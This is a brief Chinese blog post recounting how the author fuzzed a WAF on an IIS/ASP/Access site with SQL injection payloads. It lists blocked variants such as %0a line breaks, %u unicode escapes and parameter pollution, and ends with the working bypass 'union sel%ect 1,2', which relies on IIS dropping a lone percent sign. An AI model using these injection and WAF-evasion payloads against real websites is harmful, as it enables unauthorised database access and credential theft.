环境:asp+access+iis
周末有个不知名的小伙伴叫我帮忙绕下waf,看了下有点意思。
先简单看看拦截什么
union select 1,2 拦截
union%0aselect 1,2 拦截
union%0as%u0065lect 1,2 拦截
参数污染 id=86 union&id=s%u0065lect 1,2 也拦截
iis一个特性碰到单一的百分号(%)会忽略掉。
也就是说s%elect == select
但是经过fuzz如下:
union s%elect 1,2 还是拦截
union 1,2 不拦截
也就是说我们需要绕过select
union s%e%l%e%c%t 1,2拦截
我扶了扶我不存在的眼镜框,然后继续fuzz。
编故事编的我自己都有点累的,经过反复fuzz,发现在中间打断即可。
union sel%ect 1,2 不拦截,想知道为什么吗?我特么知道我就不用在fuzz了。
代码层有个很变态的过滤,过滤了很多东西,这个站并不是我的目标,我的目标就bypass waf,因为种种原因就不射出管理员密码了。
注:这文章写了好久了,不知道是否还能bypass,废话很多,也感谢你们看到这里,主要说个过程。
发表评论